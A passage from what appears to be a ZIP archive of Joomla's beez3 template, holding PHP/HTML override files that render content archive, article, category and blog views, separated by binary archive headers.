	// possibly replace with JPATH_COMPONENT.'/views/...'
} else {
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.caption');
?><div class="archive<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<form id="adminForm" action="<?php echo JRoute::_('index.php')?>" method="post">
	<fieldset class="filters">
	<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>
	<div class="filter-search">
		<?php if ($this->params->get('filter_field') !== 'hide') : ?>
		<label class="filter-search-lbl" for="filter-search"><?php echo JText::_('COM_CONTENT_'.$this->params->get('filter_field').'_FILTER_LABEL').'&#160;'; ?></label>
		<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->filter); ?>" class="inputbox" onchange="document.getElementById('adminForm').submit();" />
		<?php endif; ?>

		<?php echo $this->form->monthField; ?>
		<?php echo $this->form->yearField; ?>
		<?php echo $this->form->limitField; ?>
		<button type="submit" class="button"><?php echo JText::_('JGLOBAL_FILTER_BUTTON'); ?></button>
	</div>
	<input type="hidden" name="view" value="archive" />
	<input type="hidden" name="option" value="com_content" />
	<input type="hidden" name="limitstart" value="0" />
	</fieldset>

	<?php echo $this->loadTemplate('items'); ?>
</form>
</div>
<?php } ?>
PK՜�\"p::0beez3/html/com_content/archive/default_items.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.beez5
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

if (!$templateparams->get('html5', 0))
{
	require JPATH_BASE.'/components/com_content/views/archive/tmpl/default_items.php';
	// possibly replace with JPATH_COMPONENT.'/views/...'
} else {
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
$params = &$this->params;
?>
<ul id="archive-items">
<?php foreach ($this->items as $i => $item) : ?>
	<li class="row<?php echo $i % 2; ?>">

		<h2>
		<?php if ($params->get('link_titles')) : ?>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
				<?php echo $this->escape($item->title); ?></a>
		<?php else: ?>
				<?php echo $this->escape($item->title); ?>
		<?php endif; ?>
		</h2>


<?php if ($params->get('show_author') or $params->get('show_parent_category') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_hits')) : ?>
 <dl class="article-info">
 <dt class="article-info-term"><?php echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($params->get('show_parent_category')) : ?>
		<dd class="parent-category-name">
			<?php	$title = $this->escape($item->parent_title);
					$url = '<a href="'.JRoute::_(ContentHelperRoute::getCategoryRoute($item->parent_slug)).'">'.$title.'</a>';?>
			<?php if ($item->parent_slug && $params->get('link_parent_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>

<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php	$title = $this->escape($item->category_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($item->catslug)) . '">' . $title . '</a>'; ?>
			<?php if ($item->catslug && $params->get('link_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if (!empty($item->author) && $params->get('show_author')) : ?>
	<dd class="createdby">
		<?php $author = $item->created_by_alias ?: $item->author; ?>
			<?php if (!empty($item->contact_link ) &&  $params->get('link_author') == true):?>
				<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $item->contact_link, $author)); ?>
			<?php else :?>
				<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
			<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_hits')) :?>
	 </dl>
<?php endif; ?>

<?php  if ($params->get('show_intro')) :?>
		<div class="intro">
			<?php echo JHtml::_('string.truncate', $item->introtext, $params->get('introtext_limit')); ?>
		</div>

		<?php endif; ?>
	</li>
<?php endforeach; ?>
</ul>
<div id="pagination">
	<span><?php echo $this->pagination->getPagesLinks(); ?></span>
	<span><?php echo $this->pagination->getPagesCounter(); ?></span>
</div>
<?php } ?>
PK՜�\%�!3�	�	0beez3/html/com_content/article/default_links.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create shortcut
$urls = json_decode($this->item->urls);

// Create shortcuts to some parameters.
$params = $this->item->params;
if ($urls && (!empty($urls->urla) || !empty($urls->urlb) || !empty($urls->urlc))) :
?>
<div class="content-links">
	<ul class="nav nav-tabs nav-stacked">
		<?php
			$urlarray = array(
			array($urls->urla, $urls->urlatext, $urls->targeta, 'a'),
			array($urls->urlb, $urls->urlbtext, $urls->targetb, 'b'),
			array($urls->urlc, $urls->urlctext, $urls->targetc, 'c')
			);
			foreach ($urlarray as $url) :
				$link = $url[0];
				$label = $url[1];
				$target = $url[2];
				$id = $url[3];

				if (!$link) :
					continue;
				endif;

				// If no label is present, take the link
				$label = $label ?: $link;

				// If no target is present, use the default
				$target = $target ?: $params->get('target'.$id);
				?>
			<li class="content-links-<?php echo $id; ?>">
				<?php
					// Compute the correct link

					switch ($target)
					{
						case 1:
							// open in a new window
							echo '<a href="' . htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . '" target="_blank"  rel="nofollow noopener noreferrer">' .
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8') .'</a>';
							break;

						case 2:
							// open in a popup window
							$attribs = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width=600,height=600';
							echo "<a href=\"" . htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . "\" onclick=\"window.open(this.href, 'targetWindow', '".$attribs."'); return false;\" rel=\"noopener noreferrer\">".
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8').'</a>';
							break;
						case 3:
							// open in a modal window
							JHtml::_('behavior.modal', 'a.modal');
							echo '<a class="modal" href="' . htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . '"  rel="{handler: \'iframe\', size: {x:600, y:600}} noopener noreferrer">'.
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8') . ' </a>';
							break;

						default:
							// open in parent window
							echo '<a href="' .  htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . '" rel="nofollow">'.
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8') . ' </a>';
							break;
					}
				?>
				</li>
		<?php endforeach; ?>
	</ul>
</div>
<?php endif; ?>
PK՜�\6[�q%q%*beez3/html/com_content/article/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app            = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;
$images         = json_decode($this->item->images);
$urls           = json_decode($this->item->urls);
$user           = JFactory::getUser();

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');

// Create shortcut to parameters.
$params = $this->item->params;

$accessEdit    = $params->get('access-edit');
$showPrintIcon = $params->get('show_print_icon');
$showEmailIcon = $params->get('show_email_icon');

?>
<article class="item-page<?php echo $this->pageclass_sfx?>">
<?php if ($showPageHeading = $this->params->get('show_page_heading')) : ?>

<?php if ($showPageHeading and $params->get('show_title')) :?>
<hgroup>
<?php endif; ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php
if (!empty($this->item->pagination) && $this->item->pagination && !$this->item->paginationposition && $this->item->paginationrelative)
{
	echo $this->item->pagination;
}

if ($params->get('show_title')) : ?>
		<h2>
			<?php echo $this->escape($this->item->title); ?>
		</h2>
<?php endif; ?>
<?php if ($showPageHeading and $params->get('show_title')) :?>
</hgroup>
<?php endif; ?>

<?php // Content is generated by content plugin event "onContentAfterTitle" ?>
<div class="pull-left"><?php echo $this->item->event->afterDisplayTitle; ?></div>

<?php

if ($accessEdit || $showPrintIcon || $showEmailIcon) : ?>
		<ul class="actions">
		<?php if (!$this->print) : ?>
				<?php if ($showPrintIcon) : ?>
				<li class="print-icon">
						<?php echo JHtml::_('icon.print_popup', $this->item, $params, array(), true); ?>
				</li>
				<?php endif; ?>

				<?php if ($showEmailIcon) : ?>
				<li class="email-icon">
						<?php echo JHtml::_('icon.email', $this->item, $params, array(), true); ?>
				</li>
				<?php endif; ?>
				<?php if ($this->user->authorise('core.edit', 'com_content.article.' . $this->item->id)) : ?>
						<li class="edit-icon">
							<?php echo JHtml::_('icon.edit', $this->item, $params, array(), true); ?>
						</li>
					<?php endif; ?>
		<?php else : ?>
				<li>
						<?php echo JHtml::_('icon.print_screen', $this->item, $params, array(), true); ?>
				</li>
		<?php endif; ?>
		</ul>
<?php endif; ?>

	<?php echo $this->item->event->beforeDisplayContent; ?>

<?php $useDefList = ($params->get('show_author') or $params->get('show_category') or $params->get('show_parent_category')
	or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date')
	or $params->get('show_hits')); ?>

<?php if ($useDefList) : ?>
 <dl class="article-info">
 <dt class="article-info-term"><?php  echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($this->item->parent_slug !== '1:root' && $params->get('show_parent_category')) : ?>
		<dd class="parent-category-name">
			<?php 	$title = $this->escape($this->item->parent_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->parent_slug)) . '">' . $title . '</a>';?>
			<?php if ($params->get('link_parent_category') and $this->item->parent_slug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php 	$title = $this->escape($this->item->category_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->catslug)) . '">' . $title . '</a>';?>
			<?php if ($params->get('link_category') and $this->item->catslug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $this->item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $this->item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $this->item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if (!empty($this->item->author) && $params->get('show_author')) : ?>
	<dd class="createdby">
		<?php $author = $this->item->created_by_alias ?: $this->item->author; ?>
		<?php if (!empty($this->item->contact_link) && $params->get('link_author') == true) : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $this->item->contact_link, $author)); ?>
		<?php else : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
		<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $this->item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($useDefList) : ?>
 </dl>
<?php endif; ?>

	<?php if (isset ($this->item->toc)) : ?>
		<?php echo $this->item->toc; ?>
	<?php endif; ?>

<?php if (isset($urls) AND ((!empty($urls->urls_position) AND ($urls->urls_position == '0')) OR ($params->get('urls_position') == '0' AND empty($urls->urls_position)))
		OR (empty($urls->urls_position) AND (!$params->get('urls_position')))) : ?>

	<?php echo $this->loadTemplate('links'); ?>
<?php endif; ?>
	<?php  if (isset($images->image_fulltext) and !empty($images->image_fulltext)) : ?>
	<?php $imgfloat = empty($images->float_fulltext) ? $params->get('float_fulltext') : $images->float_fulltext; ?>

	<div class="img-fulltext-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?>">
	<img
		<?php if ($images->image_fulltext_caption):
			echo 'class="caption"'.' title="' .htmlspecialchars($images->image_fulltext_caption, ENT_COMPAT, 'UTF-8') .'"';
		endif; ?>
		src="<?php echo htmlspecialchars($images->image_fulltext, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_fulltext_alt, ENT_COMPAT, 'UTF-8'); ?>"/>
	</div>
	<?php endif; ?>
<?php
if (!empty($this->item->pagination) AND $this->item->pagination AND !$this->item->paginationposition AND !$this->item->paginationrelative):
	echo $this->item->pagination;
endif;
?>
<?php if ($params->get('access-view')):?>
	<?php echo $this->item->text; ?>
	<?php // Optional teaser intro text for guests ?>
	<?php elseif ($params->get('show_noauth') == true && $user->get('guest')) : ?>
		<?php echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>
	<?php echo JHtml::_('content.prepare', $this->item->introtext); ?>
	<?php // Optional link to let them register to see the whole article. ?>
	<?php if ($this->item->fulltext != null && $params->get('show_readmore')) : ?>
		<?php $menu = JFactory::getApplication()->getMenu(); ?>
		<?php $active = $menu->getActive(); ?>
		<?php $itemId = $active->id; ?>
		<?php $link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false)); ?>
		<?php $link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language))); ?>
		<p class="readmore">
			<a href="<?php echo $link; ?>" class="register">
			<?php $attribs = json_decode($this->item->attribs); ?>
			<?php if ($attribs->alternative_readmore == null) : ?>
				<?php echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE'); ?>
			<?php elseif ($readmore = $attribs->alternative_readmore) : ?>
				<?php echo $readmore; ?>
				<?php if ($params->get('show_readmore_title', 0) != 0) : ?>
					<?php echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit')); ?>
				<?php endif; ?>
			<?php elseif ($params->get('show_readmore_title', 0) == 0) : ?>
				<?php echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE'); ?>
			<?php else : ?>
				<?php echo JText::_('COM_CONTENT_READ_MORE'); ?>
				<?php echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit')); ?>
			<?php endif; ?>
			</a>
		</p>
	<?php endif; ?>
<?php endif; ?>
<?php // TAGS ?>
<?php if (!empty($this->item->tags->itemTags) && $params->get('show_tags', 1)) : ?>
	<?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
	<?php echo $this->item->tagLayout->render($this->item->tags->itemTags); ?>
<?php endif; ?>
<?php if (!empty($this->item->pagination) AND $this->item->pagination AND $this->item->paginationposition AND!$this->item->paginationrelative) : ?>
	<?php echo $this->item->pagination; ?>
<?php endif; ?>
	<?php if (isset($urls) AND ((!empty($urls->urls_position) AND ($urls->urls_position == '1')) OR ( $params->get('urls_position') == '1'))) : ?>
		<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>
<?php if (!empty($this->item->pagination) AND $this->item->pagination AND $this->item->paginationposition AND $this->item->paginationrelative) : ?>
	<?php echo $this->item->pagination; ?>
<?php endif; ?>
	<?php echo $this->item->event->afterDisplayContent; ?>
</article>
PK՜�\#'�g��3beez3/html/com_content/categories/default_items.phpnu�[���<?php

/**
 * @package     Joomla.Site
 * @subpackage  com_content
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<h3 class="item-title"><a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($item->id));?>">
			<?php echo $this->escape($item->title); ?></a>
		</h3>

		<?php if ($this->params->get('show_subcat_desc_cat') == 1) :?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>
		<?php if ($this->params->get('show_cat_num_articles_cat') == 1) :?>
			<dl class="article-count"><dt>
				<?php echo JText::_('COM_CONTENT_NUM_ITEMS'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK՜�\�t-beez3/html/com_content/categories/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.beez5
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_base_description')) : ?>
	<?php 	//If there is a description in the menu parameters use that; ?>
		<?php if ($this->params->get('categories_description')) : ?>
			<?php echo  JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_content.categories'); ?>
		<?php  else: ?>
			<?php //Otherwise get one from the database if it exists. ?>
			<?php  if ($this->parent->description) : ?>
				<div class="category-desc">
					<?php  echo JHtml::_('content.prepare', $this->parent->description, '', 'com_content.categories'); ?>
				</div>
			<?php  endif; ?>
		<?php  endif; ?>
<?php endif; ?>
<?php
echo $this->loadTemplate('items');
?>
</div>

PK՜�\�c��.beez3/html/com_content/category/blog_links.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

?>

<div class="items-more">
	<h3><?php echo JText::_('COM_CONTENT_MORE_ARTICLES'); ?></h3>
	<ol>
	<?php foreach ($this->link_items as &$item) : ?>
		<li>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
			<?php echo $item->title; ?></a>
		</li>
	<?php endforeach; ?>
	</ol>
</div>
PK՜�\U��#��-beez3/html/com_content/category/blog_item.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */
defined('_JEXEC') or die;

$params = &$this->item->params;
$images = json_decode($this->item->images);
$app = JFactory::getApplication();
$canEdit = $this->item->params->get('access-edit');

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

$currentDate   = JFactory::getDate()->format('Y-m-d H:i:s');
$isUnpublished = ($this->item->state == 0 || $this->item->publish_up > $currentDate)
	|| ($this->item->publish_down < $currentDate && $this->item->publish_down !== JFactory::getDbo()->getNullDate());

?>
<?php if ($isUnpublished) : ?>
	<div class="system-unpublished">
<?php endif; ?>
<?php if ($params->get('show_title')) : ?>
	<h2>
		<?php if ($params->get('link_titles') && $params->get('access-view')) : ?>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)); ?>">
			<?php echo $this->escape($this->item->title); ?></a>
		<?php else : ?>
			<?php echo $this->escape($this->item->title); ?>
		<?php endif; ?>
	</h2>
<?php endif; ?>

<?php // Content is generated by content plugin event "onContentAfterTitle" ?>
<div class="pull-left"><?php echo $this->item->event->afterDisplayTitle; ?></div>

<?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
	<ul class="actions">
		<?php if ($params->get('show_print_icon')) : ?>
		<li class="print-icon">
			<?php echo JHtml::_('icon.print_popup', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
		<?php if ($params->get('show_email_icon')) : ?>
		<li class="email-icon">
			<?php echo JHtml::_('icon.email', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
		<?php if ($canEdit) : ?>
		<li class="edit-icon">
			<?php echo JHtml::_('icon.edit', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
	</ul>
<?php endif; ?>

<?php echo $this->item->event->beforeDisplayContent; ?>

<?php // to do not that elegant would be nice to group the params ?>

<?php if ($params->get('show_author') || $params->get('show_category') || $params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_parent_category') || $params->get('show_hits')) : ?>
	<dl class="article-info">
	<dt class="article-info-term"><?php echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($params->get('show_parent_category') && $this->item->parent_id != 1) : ?>
		<dd class="parent-category-name">
			<?php $title = $this->escape($this->item->parent_title);
				$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->parent_id)) . '">' . $title . '</a>'; ?>
			<?php if ($params->get('link_parent_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php $title = $this->escape($this->item->category_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->catid)) . '">' . $title . '</a>'; ?>
			<?php if ($params->get('link_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $this->item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $this->item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $this->item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') && !empty($this->item->author )) : ?>
	<dd class="createdby">
		<?php $author = $this->item->created_by_alias ?: $this->item->author; ?>
		<?php if (!empty($this->item->contact_link) && $params->get('link_author') == true) : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $this->item->contact_link, $author)); ?>
		<?php else :?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
		<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $this->item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') || $params->get('show_category') || $params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_parent_category') || $params->get('show_hits')) :?>
	</dl>
<?php endif; ?>
<?php if (isset($images->image_intro) && !empty($images->image_intro)) : ?>
	<?php $imgfloat = empty($images->float_intro) ? $params->get('float_intro') : $images->float_intro; ?>
	<div class="img-intro-<?php echo htmlspecialchars($imgfloat); ?>">
	<img
		<?php if ($images->image_intro_caption):
			echo 'class="caption"'.' title="' . htmlspecialchars($images->image_intro_caption, ENT_COMPAT, 'UTF-8') . '"';
		endif; ?>
		src="<?php echo htmlspecialchars($images->image_intro, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_intro_alt, ENT_COMPAT, 'UTF-8'); ?>"/>
	</div>
<?php endif; ?>
<?php echo $this->item->introtext; ?>

<?php if ($params->get('show_readmore') && $this->item->readmore) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
		$link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)));
	endif;
?>
		<p class="readmore">
				<a href="<?php echo $link; ?>">
					<?php if (!$params->get('access-view')) :
						echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
					elseif ($readmore = $this->item->alternative_readmore) :
						echo $readmore;
						if ($params->get('show_readmore_title', 0) != 0) :
							echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
						endif;
					elseif ($params->get('show_readmore_title', 0) == 0) :
						echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
					else :
						echo JText::_('COM_CONTENT_READ_MORE');
						echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
					endif; ?></a>
		</p>
<?php endif; ?>

<?php if ($isUnpublished) : ?>
	</div>
<?php endif; ?>

<div class="item-separator"></div>
<?php echo $this->item->event->afterDisplayContent; ?>
PK՜�\�[?�NN+beez3/html/com_content/category/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app            = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;


JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');

$showCategoryTitle            = $this->params->get('show_category_title') == 1;
$showCategoryHeadingTitleText = $this->params->get('show_category_heading_title_text', 1) == 1;
$pageSubHeading               = $this->params->get('page_subheading');
?>
<section class="category-list<?php echo $this->pageclass_sfx;?>">
<?php
if ($showPageHeading = $this->params->get('show_page_heading')) : ?>
<?php if ($showPageHeading and ($showCategoryTitle === true or $pageSubHeading)) : ?>
<hgroup>
<?php endif; ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<?php if ($showCategoryTitle === true or $pageSubHeading) : ?>
<h2>
	<?php echo $this->escape($pageSubHeading); ?>
	<?php if ($showCategoryTitle === true)
	{
		echo '<span class="subheading-category">'.JHtml::_('content.prepare', $this->category->title, '', 'com_content.category.title').'</span>';
	}
	?>
</h2>
<?php if ($this->params->get('show_page_heading') and ($this->params->get('show_category_title', 1) or $pageSubHeading)) : ?>
</hgroup>
<?php endif; ?>
<?php endif; ?>

<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
